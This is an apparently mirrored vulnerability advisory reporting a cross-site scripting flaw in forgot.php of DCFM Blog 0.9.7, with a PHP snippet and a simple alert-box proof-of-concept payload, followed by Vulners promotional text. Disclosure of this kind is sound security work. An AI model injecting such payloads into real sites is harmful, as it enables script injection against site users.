`DCFM Blog 0.9.7 XSS Attack
===========================
Discovered by N_A , N_A[at]tutanota.com
========================================
Description
============
Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.
https://sourceforge.net/projects/dcfm-blog/
Vulnerability
=============
The forgot.php file in DCFM Blog 0.9.7 does not proplery check input and code injection is possible.
if (!isset($_POST['userf'])) {
echo "<form action='forgot.php' method='post'>
Please provide your username:
<input type='text' name='userf' />
<br /><br /><input type='submit' value='Get my Password' />
</form>";
Proof Of Concept String
========================
<script>alert('XSS');</script>
Email
=====
N_A[at]tutanota.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation